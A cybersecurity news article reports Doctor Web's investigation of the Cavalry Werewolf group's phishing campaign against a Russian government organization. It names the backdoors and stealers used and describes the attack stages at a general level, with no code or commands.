In July 2025, Doctor Web’s anti-virus laboratory received a critical alert from a government-owned organization within the Russian Federation.
The institution suspected a network compromise after discovering spam emails originating from one of their corporate email addresses.
What began as a routine investigation quickly escalated into the discovery of a sophisticated targeted attack orchestrated by the threat actor group known as Cavalry Werewolf.
The investigation revealed that the attackers’ primary objectives included stealing confidential information and mapping the organization’s network configuration to facilitate deeper penetration into critical infrastructure.
The threat actors employed a conventional yet highly effective attack vector: phishing emails containing malicious attachments disguised as legitimate government documents.
These messages were delivered via BackDoor.ShellNET.1, a previously unknown backdoor based on the Reverse-Shell-CS open-source project.
This malware was cleverly packaged within password-protected archives using deceptive file names that mimicked official government correspondence, such as “Служебная записка от 16.06.2025” and “О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe.”
Once executed, the backdoor established a reverse shell connection, granting attackers remote command execution capabilities on the compromised system.
Following successful initial access, Cavalry Werewolf leveraged the Windows built-in tool Bitsadmin to download additional malicious payloads from their command and control servers.
The attackers immediately deployed Trojan.FileSpyNET.5, a sophisticated file stealer designed to exfiltrate documents in formats including .doc, .docx, .xlsx, .pdf, and image files.
Subsequently, they installed BackDoor.Tunnel.41, a malware variant based on ReverseSocks5 open-source software, which enabled the creation of SOCKS5 tunnels for covert network access and command execution capabilities.
Doctor Web’s investigation uncovered an extensive toolkit employed by Cavalry Werewolf across multiple attack stages.
The initial compromise phase involved diverse malware variants, including BAT.DownLoader.1138 batch scripts, executable trojans like Trojan.Packed2.49708 and Trojan.Siggen31.54011, and multiple backdoor variants including BackDoor.Siggen2.5463 and BackDoor.RShell.169.
Each variant served specific purposes within the attack chain, with some controlled via Telegram bots for command distribution.
During subsequent infection stages, the group deployed advanced backdoors such as Trojan.Inject5.57968, which injected encrypted payloads into legitimate aspnet_compiler.exe processes, and BackDoor.ReverseProxy.1, which established persistent SOCKS5 proxy access.
Notably, Cavalry Werewolf tampered with legitimate software binaries, including WinRar, 7-Zip, Visual Studio Code, and PDF readers, embedding malicious code while rendering the applications non-functional.
Network Reconnaissance
Once entrenched in victim networks, Cavalry Werewolf executed systematic reconnaissance activities using legitimate Windows utilities.
The attackers queried user information, enumerated network configurations via ipconfig commands, and tested proxy server connectivity.
They leveraged PowerShell, Bitsadmin, and curl to deliver additional malicious tools, modified Windows registry entries for persistence, and utilized public directories like C:userspublicpictures for staging malware payloads.
The Cavalry Werewolf campaign demonstrates a sophisticated threat actor group specializing in targeted attacks against government infrastructure.
Their preference for open-source software, extensive backdoor arsenal, and operational security practices position them as a significant persistent threat.
Organizations should implement robust email filtering, endpoint detection capabilities, and network segmentation to defend against similar targeted campaigns.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.